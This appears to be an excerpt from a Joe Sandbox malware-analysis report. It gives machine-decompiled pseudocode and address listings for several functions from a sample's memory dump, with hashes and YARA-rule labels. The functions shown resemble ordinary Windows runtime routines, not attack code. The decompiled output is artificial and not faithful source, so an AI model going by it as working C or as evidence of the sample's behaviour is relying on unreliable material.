                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 95c2207fbf876ed208a46543e887111e49e0778f7c34e031ba9925a7ad44d862
                                                                                                            • Instruction ID: bc7f37ccac3e6d0bf57329524d3dcd37ea943bebf41d9dc27f5a46f8ad855890
                                                                                                            • Opcode Fuzzy Hash: 95c2207fbf876ed208a46543e887111e49e0778f7c34e031ba9925a7ad44d862
                                                                                                            • Instruction Fuzzy Hash: BC419FB1D002189EDB64CFAAD980AEDFBF8FB48310F5081AEE559A7240E7705A84CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0109E730 Relevance: .1, Instructions: 89COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 74%
                                                                                                            			E0109E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E010A9670() < 0) {
					L010BDF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x1157b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L01084620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0109E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                                                                            0x0109e730
                                                                                                            0x0109e736
                                                                                                            0x0109e738
                                                                                                            0x0109e73d
                                                                                                            0x0109e73e
                                                                                                            0x0109e740
                                                                                                            0x0109e749
                                                                                                            0x0109e765
                                                                                                            0x0109e76a
                                                                                                            0x0109e76b
                                                                                                            0x0109e76c
                                                                                                            0x0109e76d
                                                                                                            0x0109e76e
                                                                                                            0x0109e76f
                                                                                                            0x0109e775
                                                                                                            0x0109e777
                                                                                                            0x0109e77e
                                                                                                            0x010db675
                                                                                                            0x0109e784
                                                                                                            0x0109e784
                                                                                                            0x0109e789
                                                                                                            0x0109e7a8
                                                                                                            0x0109e7ac
                                                                                                            0x0109e807
                                                                                                            0x0109e7ae
                                                                                                            0x0109e7ae
                                                                                                            0x0109e7b1
                                                                                                            0x0109e7b4
                                                                                                            0x0109e7b9
                                                                                                            0x0109e7c0
                                                                                                            0x0109e7c4
                                                                                                            0x0109e7ca
                                                                                                            0x0109e7cc
                                                                                                            0x00000000
                                                                                                            0x0109e7d3
                                                                                                            0x0109e7d6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0109e7ff
                                                                                                            0x0109e802
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0109e7f9
                                                                                                            0x0109e7fc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0109e7f3
                                                                                                            0x0109e7f6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0109e7ed
                                                                                                            0x0109e7f0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0109e7e7
                                                                                                            0x0109e7ea
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010db685
                                                                                                            0x010db688
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010db682
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0109e7cc
                                                                                                            0x0109e7d9
                                                                                                            0x0109e7dc
                                                                                                            0x0109e7de
                                                                                                            0x0109e7de
                                                                                                            0x0109e7ac
                                                                                                            0x0109e7e4
                                                                                                            0x0109e74b
                                                                                                            0x0109e751
                                                                                                            0x0109e759
                                                                                                            0x0109e761
                                                                                                            0x0109e761

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bcc488b43da6ea097a54fcfd9dc5ddc03b51c7676c038fd4a27b32c2a2c50060
                                                                                                            • Instruction ID: fb97e8dcc68b6c8bd3113c568ca49142aeebebfd13c1bb4de31513d7cd8ce9ca
                                                                                                            • Opcode Fuzzy Hash: bcc488b43da6ea097a54fcfd9dc5ddc03b51c7676c038fd4a27b32c2a2c50060
                                                                                                            • Instruction Fuzzy Hash: 07316D75A14249EFDB44CF58D841B9AFBE4FB09314F1482AAF948CB341E631ED90CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0109BC2C Relevance: .1, Instructions: 88COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 67%
                                                                                                            			E0109BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x1156100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E01082280(0xd, 0x56af1a0);
				_t41 =  *0x11560f8; // 0x0
				if(_t41 != 0) {
					 *0x11560f8 =  *_t41;
					 *0x11560fc =  *0x11560fc + 0xffff;
				}
				E0107FFB0(_t41, 0x800, 0x56af1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x11560f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L01084620(0x1156100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x1156100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                                                                            0x0109bc36
                                                                                                            0x0109bc42
                                                                                                            0x0109bc45
                                                                                                            0x0109bc4a
                                                                                                            0x0109bd35
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0109bc50
                                                                                                            0x0109bc50
                                                                                                            0x0109bc58
                                                                                                            0x0109bc5a
                                                                                                            0x0109bc60
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010da4f2
                                                                                                            0x010da4f6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010da4fc
                                                                                                            0x0109bc79
                                                                                                            0x0109bc7e
                                                                                                            0x0109bc86
                                                                                                            0x0109bd16
                                                                                                            0x0109bd20
                                                                                                            0x0109bd20
                                                                                                            0x0109bc8d
                                                                                                            0x0109bc94
                                                                                                            0x0109bcbd
                                                                                                            0x0109bcca
                                                                                                            0x0109bccb
                                                                                                            0x0109bccc
                                                                                                            0x0109bccd
                                                                                                            0x0109bcce
                                                                                                            0x0109bcd4
                                                                                                            0x0109bcea
                                                                                                            0x0109bcee
                                                                                                            0x0109bcf2
                                                                                                            0x0109bd00
                                                                                                            0x0109bd04
                                                                                                            0x00000000
                                                                                                            0x0109bc96
                                                                                                            0x0109bcab
                                                                                                            0x0109bcaf
                                                                                                            0x0109bd2c
                                                                                                            0x0109bd2c
                                                                                                            0x0109bd09
                                                                                                            0x00000000
                                                                                                            0x0109bd09
                                                                                                            0x0109bcb1
                                                                                                            0x0109bcb5
                                                                                                            0x0109bcbb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0109bcbb

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1fdd3c3afa6cdea2a097d740131f41cb0bb33442e035d9103393430d1c74ab29
                                                                                                            • Instruction ID: a29bb7b1d51c2779dd45af556e0ce524b9fc832ade27289b4a6c16cf659fd573
                                                                                                            • Opcode Fuzzy Hash: 1fdd3c3afa6cdea2a097d740131f41cb0bb33442e035d9103393430d1c74ab29
                                                                                                            • Instruction Fuzzy Hash: BF31FF72A01656DBCB61EF58E490BAA73B4FF18320F4440B8EDA4DB205EB74D985DBC1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01069100 Relevance: .1, Instructions: 87COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 76%
                                                                                                            			E01069100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x113f6e8);
				E010BD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E011388F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E010BD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x11586c0; // 0xc007b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x11586b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E01082280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E011388F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E010AAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x115b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x11584c0;
										if(_t69 >=  *0x11584c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E01139063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0106922A(_t82);
							_t53 = E01087D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E01138B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x11586c0; // 0xc007b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x11586b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x11586bc;
										_t72 = 0x11586b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E01069240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x11586c4;
									_t72 = 0x11586c0;
									L18:
									E01099B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                                                                            0x01069100
                                                                                                            0x01069100
                                                                                                            0x01069100
                                                                                                            0x01069100
                                                                                                            0x01069102
                                                                                                            0x01069107
                                                                                                            0x0106910c
                                                                                                            0x01069110
                                                                                                            0x01069115
                                                                                                            0x01069136
                                                                                                            0x01069143
                                                                                                            0x010c37e4
                                                                                                            0x010c37e4
                                                                                                            0x01069149
                                                                                                            0x0106914e
                                                                                                            0x0106914e
                                                                                                            0x01069117
                                                                                                            0x0106911d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0106911f
                                                                                                            0x01069125
                                                                                                            0x00000000
                                                                                                            0x01069151
                                                                                                            0x01069158
                                                                                                            0x0106915d
                                                                                                            0x01069161
                                                                                                            0x01069168
                                                                                                            0x010c3715
                                                                                                            0x00000000
                                                                                                            0x0106916e
                                                                                                            0x0106916e
                                                                                                            0x01069175
                                                                                                            0x01069177
                                                                                                            0x0106917e
                                                                                                            0x0106917f
                                                                                                            0x01069182
                                                                                                            0x01069182
                                                                                                            0x01069187
                                                                                                            0x01069187
                                                                                                            0x0106918a
                                                                                                            0x0106918d
                                                                                                            0x0106918f
                                                                                                            0x01069192
                                                                                                            0x01069195
                                                                                                            0x01069198
                                                                                                            0x01069198
                                                                                                            0x01069198
                                                                                                            0x0106919a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c371f
                                                                                                            0x010c3721
                                                                                                            0x010c3727
                                                                                                            0x010c372f
                                                                                                            0x010c3733
                                                                                                            0x010c3735
                                                                                                            0x010c3738
                                                                                                            0x010c373b
                                                                                                            0x010c373d
                                                                                                            0x010c3740
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c3746
                                                                                                            0x010c3749
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c374f
                                                                                                            0x010c3751
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c3757
                                                                                                            0x010c3759
                                                                                                            0x010c375c
                                                                                                            0x010c375c
                                                                                                            0x010c375e
                                                                                                            0x010c375e
                                                                                                            0x010c3761
                                                                                                            0x010c3764
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c3766
                                                                                                            0x010c3768
                                                                                                            0x010c37a3
                                                                                                            0x010c37a3
                                                                                                            0x010c37a5
                                                                                                            0x010c37a7
                                                                                                            0x010c37ad
                                                                                                            0x010c37b0
                                                                                                            0x010c37b2
                                                                                                            0x010c37bc
                                                                                                            0x010c37c2
                                                                                                            0x010c37c2
                                                                                                            0x010c37b2
                                                                                                            0x01069187
                                                                                                            0x01069187
                                                                                                            0x0106918a
                                                                                                            0x0106918d
                                                                                                            0x0106918f
                                                                                                            0x01069192
                                                                                                            0x01069195
                                                                                                            0x00000000
                                                                                                            0x01069195
                                                                                                            0x00000000
                                                                                                            0x01069187
                                                                                                            0x010c376a
                                                                                                            0x010c376a
                                                                                                            0x010c376c
                                                                                                            0x010c376c
                                                                                                            0x010c376f
                                                                                                            0x010c3775
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c3777
                                                                                                            0x010c3779
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c3782
                                                                                                            0x010c3787
                                                                                                            0x010c3789
                                                                                                            0x010c3790
                                                                                                            0x010c3790
                                                                                                            0x010c378b
                                                                                                            0x010c378b
                                                                                                            0x010c378b
                                                                                                            0x010c3792
                                                                                                            0x010c3795
                                                                                                            0x010c3795
                                                                                                            0x010c3798
                                                                                                            0x010c3798
                                                                                                            0x010c379b
                                                                                                            0x010c379b
                                                                                                            0x010691a3
                                                                                                            0x010691a9
                                                                                                            0x010691b0
                                                                                                            0x010691b4
                                                                                                            0x010691b4
                                                                                                            0x010691bb
                                                                                                            0x010691c0
                                                                                                            0x010691c5
                                                                                                            0x010691c7
                                                                                                            0x010c37da
                                                                                                            0x010691cd
                                                                                                            0x010691cd
                                                                                                            0x010691cd
                                                                                                            0x010691d2
                                                                                                            0x010691d5
                                                                                                            0x01069239
                                                                                                            0x01069239
                                                                                                            0x010691d7
                                                                                                            0x010691db
                                                                                                            0x010691e1
                                                                                                            0x010691e7
                                                                                                            0x010691fd
                                                                                                            0x01069203
                                                                                                            0x0106921e
                                                                                                            0x01069223
                                                                                                            0x00000000
                                                                                                            0x01069223
                                                                                                            0x01069205
                                                                                                            0x01069208
                                                                                                            0x0106920c
                                                                                                            0x01069214
                                                                                                            0x01069214
                                                                                                            0x010691e9
                                                                                                            0x010691e9
                                                                                                            0x010691ee
                                                                                                            0x010691f3
                                                                                                            0x010691f3
                                                                                                            0x010691f3
                                                                                                            0x010691e7
                                                                                                            0x00000000
                                                                                                            0x010691db
                                                                                                            0x01069187
                                                                                                            0x01069168

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7dcece3a40b495675ec65b976273d523588c6cf40066864b414cabc1802e54d2
                                                                                                            • Instruction ID: 08f1dc9805e96532baf7e73d86e27d0a0cc47f70ba4387aa65fdc7d6e27e08e0
                                                                                                            • Opcode Fuzzy Hash: 7dcece3a40b495675ec65b976273d523588c6cf40066864b414cabc1802e54d2
                                                                                                            • Instruction Fuzzy Hash: A331F871A01246DFDB65DF6CC1887ECBBF5BF88318F24819DC5946B641C334A980CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01091DB5 Relevance: .1, Instructions: 87COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 60%
                                                                                                            			E01091DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0108F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L01084620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0108F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                                                                            0x01091dc2
                                                                                                            0x01091dc5
                                                                                                            0x01091dc7
                                                                                                            0x01091dcc
                                                                                                            0x01091dce
                                                                                                            0x01091dd6
                                                                                                            0x01091ddf
                                                                                                            0x01091de0
                                                                                                            0x01091de1
                                                                                                            0x01091de5
                                                                                                            0x01091de8
                                                                                                            0x01091def
                                                                                                            0x01091df0
                                                                                                            0x01091df6
                                                                                                            0x01091df7
                                                                                                            0x01091dfe
                                                                                                            0x01091e1a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01091e0b
                                                                                                            0x01091e12
                                                                                                            0x01091e12
                                                                                                            0x01091e00
                                                                                                            0x01091e00
                                                                                                            0x01091e05
                                                                                                            0x01091e1e
                                                                                                            0x01091e23
                                                                                                            0x010d570f
                                                                                                            0x010d5713
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d5719
                                                                                                            0x010d5719
                                                                                                            0x01091e2c
                                                                                                            0x01091e2d
                                                                                                            0x01091e2e
                                                                                                            0x01091e2f
                                                                                                            0x01091e31
                                                                                                            0x01091e32
                                                                                                            0x01091e35
                                                                                                            0x01091e3d
                                                                                                            0x010d5723
                                                                                                            0x010d573d
                                                                                                            0x010d573d
                                                                                                            0x00000000
                                                                                                            0x010d5723
                                                                                                            0x01091e49
                                                                                                            0x01091e4e
                                                                                                            0x01091e4e
                                                                                                            0x01091e09
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                                            • Instruction ID: a0f22c18344462a23146c03ccb9d05b1e6a9d406d6b66710ef3b746383f2f3bc
                                                                                                            • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                                            • Instruction Fuzzy Hash: 81219F3270421AFBDB21DF59CC90EAABBBDEF89750F114095EA8197210D674AE01D7A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01080050 Relevance: .1, Instructions: 81COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 53%
                                                                                                            			E01080050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x115d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E01099ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E010AB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E01138A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E01099702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x115b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                                                                            0x01080055
                                                                                                            0x0108005d
                                                                                                            0x01080062
                                                                                                            0x0108006c
                                                                                                            0x0108006f
                                                                                                            0x01080074
                                                                                                            0x0108007a
                                                                                                            0x0108007a
                                                                                                            0x01080080
                                                                                                            0x01080080
                                                                                                            0x01080087
                                                                                                            0x0108008d
                                                                                                            0x0108008f
                                                                                                            0x01080093
                                                                                                            0x01080095
                                                                                                            0x0108009b
                                                                                                            0x010800f8
                                                                                                            0x010800fb
                                                                                                            0x010800fc
                                                                                                            0x010800ff
                                                                                                            0x01080108
                                                                                                            0x01080108
                                                                                                            0x010800a2
                                                                                                            0x010800a6
                                                                                                            0x010800b3
                                                                                                            0x010800bc
                                                                                                            0x010800c5
                                                                                                            0x010800ca
